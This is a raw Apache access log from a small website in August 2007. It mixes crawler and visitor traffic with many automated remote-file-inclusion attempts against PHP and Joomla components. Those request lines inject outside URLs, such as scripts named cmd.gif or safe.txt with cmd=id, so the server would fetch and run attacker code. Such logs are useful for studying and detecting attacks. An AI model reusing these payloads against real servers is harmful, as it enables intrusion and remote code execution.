195.242.211.140 - - [18/Aug/2007:16:00:38 -0700] "GET /logs//plugins/spamx/MTBlackList.Examine.class.php?_CONF%5Bpath%5D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:16:09:32 -0700] "GET /logs/access.log HTTP/1.1" 200 473814 "-" "Googlebot-Image/1.0" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:23:47 -0700] "GET /?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0 HTTP/1.1" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:23:59 -0700] "GET /clipart/lines/horizontal/darkgreen_gradient.gif HTTP/1.1" 200 709 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:23:59 -0700] "GET /clipart/pageHeaders/greenLeafBridge.gif HTTP/1.1" 200 47456 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:23:59 -0700] "GET /clipart/images/sidebars/leafLeft.gif HTTP/1.1" 200 33964 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:24:00 -0700] "GET /sitebuilder/images/navbar-1-inactive-65328.png HTTP/1.1" 200 273 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:24:00 -0700] "GET /sitebuilder/images/navbar-0-active-65203.png HTTP/1.1" 200 250 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:24:00 -0700] "GET /sitebuilder/images/navbar-2-inactive-65484.png HTTP/1.1" 200 303 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:24:00 -0700] "GET /sitebuilder/images/navbar-3-inactive-65640.png HTTP/1.1" 200 298 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:24:01 -0700] "GET /images/promo_mail.gif HTTP/1.1" 200 1469 "http://www.projectpr.com/?SID=aVR4P0NieDtqRFp4X1ROdFg+TjRqVE4+aF0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.projectpr.com"
75.111.95.126 - - [18/Aug/2007:16:24:02 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Google Desktop)" "www.projectpr.com"
74.6.19.107 - - [18/Aug/2007:16:29:41 -0700] "GET /clipart/?M=D HTTP/1.0" 200 1197 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:16:30:16 -0700] "GET /logs/access.log HTTP/1.1" 200 477237 "-" "Googlebot-Image/1.0" "www.projectpr.com"
87.106.28.84 - - [18/Aug/2007:16:35:44 -0700] "GET /logs/access.log///newspublish/include.php?path[docroot]=http://n0ne.net/id.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.64" "www.projectpr.com"
87.106.28.84 - - [18/Aug/2007:16:35:44 -0700] "GET ///newspublish/include.php?path[docroot]=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
87.106.28.84 - - [18/Aug/2007:16:35:44 -0700] "GET /logs///newspublish/include.php?path[docroot]=http://n0ne.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:16:45:14 -0700] "GET /logs/access.log HTTP/1.1" 200 477924 "-" "Googlebot-Image/1.0" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /logs/access.log/index.php0?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /logs/access.log/index0.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /logs/access.log/index.php1?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /logs/access.log/index1.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /logs/access.log/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /index.php0?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /index0.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /index.php1?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /index1.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:32 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/index.php0?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/index.php1?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 261 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/index0.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/index1.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/access.log/index.php2?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /index.php2?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:47:33 -0700] "GET /logs/index.php2?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:16:48:43 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:49:11 -0700] "GET /logs/access.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:49:11 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:16:49:11 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:16:55:27 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:16:58:05 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:00:58 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:03:08 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:05:34 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:08:25 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:17:09:43 -0700] "GET /logs/access.log HTTP/1.1" 200 485112 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:11:05 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:13:32 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:16:14 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:18:46 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:21:31 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:24:01 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:17:24:59 -0700] "GET /logs/access.log HTTP/1.1" 200 486668 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:26:31 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:29:28 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:32:13 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 275 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:34:51 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 289 "-" "-" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:17:38:11 -0700] "GET /logs/access.log HTTP/1.1" 200 487768 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
125.141.106.81 - - [18/Aug/2007:17:38:49 -0700] "GET /logs/access_060312.log HTTP/1.1" 200 401131 "-" "hva wttppf6so tgbxxvmjqvN ffjr" "www.projectpr.com"
66.249.67.53 - - [18/Aug/2007:17:42:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.249.67.53 - - [18/Aug/2007:17:42:53 -0700] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:17:46:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 290 "-" "-" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:17:57:44 -0700] "GET /logs/access.log HTTP/1.1" 200 488670 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
66.28.193.216 - - [18/Aug/2007:17:57:57 -0700] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 331 "-" "libwww-perl/5.805" "www.projectpr.com"
66.28.193.216 - - [18/Aug/2007:17:57:57 -0700] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.28.193.216 - - [18/Aug/2007:17:57:57 -0700] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.6.19.103 - - [18/Aug/2007:17:59:28 -0700] "GET /navigation_bars/?M=D HTTP/1.0" 200 807 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:18:11:33 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 295 "-" "-" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:18:16:26 -0700] "GET /logs/access.log HTTP/1.1" 200 490068 "-" "Googlebot-Image/1.0" "www.projectpr.com"
66.249.67.53 - - [18/Aug/2007:18:28:02 -0700] "GET /clipart/?M=A HTTP/1.1" 200 1213 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
202.131.0.54 - - [18/Aug/2007:18:32:41 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://minharosa.100webspace.net/id.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.805" "www.projectpr.com"
202.131.0.54 - - [18/Aug/2007:18:32:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://minharosa.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:18:35:48 -0700] "GET /logs/access.log HTTP/1.1" 200 490847 "-" "Googlebot-Image/1.0" "www.projectpr.com"
202.131.0.54 - - [18/Aug/2007:18:41:36 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://minharosa.100webspace.net/id.txt? HTTP/1.1" 404 321 "-" "libwww-perl/5.805" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:18:42:32 -0700] "GET /logs/access.log/index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 272 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:18:42:33 -0700] "GET /index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
72.32.6.33 - - [18/Aug/2007:18:42:33 -0700] "GET /logs/index3.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://servinweb.com/tCustom/josmi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
209.191.87.217 - - [18/Aug/2007:18:45:53 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfh1vwfgyt0+afrwdmpuvq HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
209.191.87.217 - - [18/Aug/2007:18:45:55 -0700] "GET /?sid=avr4p0niedtqrfp4x1rodfh1vwfgyt0+afrwdmpuvq HTTP/1.0" 200 10036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.projectpr.com"
74.6.19.124 - - [18/Aug/2007:18:50:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
74.6.24.151 - - [18/Aug/2007:18:50:29 -0700] "GET /logs/?N=A HTTP/1.0" 200 3782 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:18:55:27 -0700] "GET /logs/access.log HTTP/1.1" 200 492784 "-" "Googlebot-Image/1.0" "www.projectpr.com"
195.225.100.98 - - [18/Aug/2007:19:00:57 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.225.100.98 - - [18/Aug/2007:19:01:01 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
66.249.67.53 - - [18/Aug/2007:19:03:19 -0700] "GET /clipart/images/ HTTP/1.1" 200 822 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
195.225.100.98 - - [18/Aug/2007:19:06:43 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.225.100.98 - - [18/Aug/2007:19:06:44 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:19:15:12 -0700] "GET /logs/access.log HTTP/1.1" 200 494062 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
195.225.100.98 - - [18/Aug/2007:19:20:50 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
195.225.100.98 - - [18/Aug/2007:19:24:22 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://paginas.terra.com.br/lazer/lunero/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:19:34:18 -0700] "GET /logs/access.log HTTP/1.1" 200 494756 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
74.6.24.207 - - [18/Aug/2007:19:51:54 -0700] "GET /clipart/pageHeaders/ HTTP/1.0" 200 691 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:19:52:59 -0700] "GET /logs/access.log HTTP/1.1" 200 495144 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:20:11:43 -0700] "GET /logs/access.log HTTP/1.1" 200 495332 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
212.241.214.84 - - [18/Aug/2007:20:16:51 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.divinedizine.co.uk/catalog/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
212.241.214.84 - - [18/Aug/2007:20:16:51 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.divinedizine.co.uk/catalog/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:20:30:09 -0700] "GET /logs/access.log HTTP/1.1" 200 495973 "-" "Googlebot-Image/1.0" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:20:37:27 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 305 "-" "-" "www.projectpr.com"
200.146.64.158 - - [18/Aug/2007:20:38:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://geocities.yahoo.com.br/diego_8102000/cmd.gif?&cmd=id HTTP/1.1" 404 305 "-" "-" "www.projectpr.com"
212.241.214.84 - - [18/Aug/2007:20:41:13 -0700] "GET /logs/access.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.divinedizine.co.uk/catalog/cmdx.txt? HTTP/1.1" 404 310 "-" "libwww-perl/5.803" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:20:48:53 -0700] "GET /logs/access.log HTTP/1.1" 200 496814 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
222.124.17.75 - - [18/Aug/2007:20:49:46 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-" "libwww-perl/5.805" "www.projectpr.com"
222.124.17.75 - - [18/Aug/2007:20:49:47 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:21:07:54 -0700] "GET /logs/access.log HTTP/1.1" 200 497479 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:21:26:46 -0700] "GET /logs/access.log HTTP/1.1" 200 497667 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
65.55.209.13 - - [18/Aug/2007:21:31:47 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
65.55.209.13 - - [18/Aug/2007:21:31:47 -0700] "GET / HTTP/1.0" 200 10036 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.projectpr.com"
208.66.194.5 - - [18/Aug/2007:21:48:27 -0700] "GET /logs/access.log HTTP/1.1" 200 498155 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.projectpr.com"
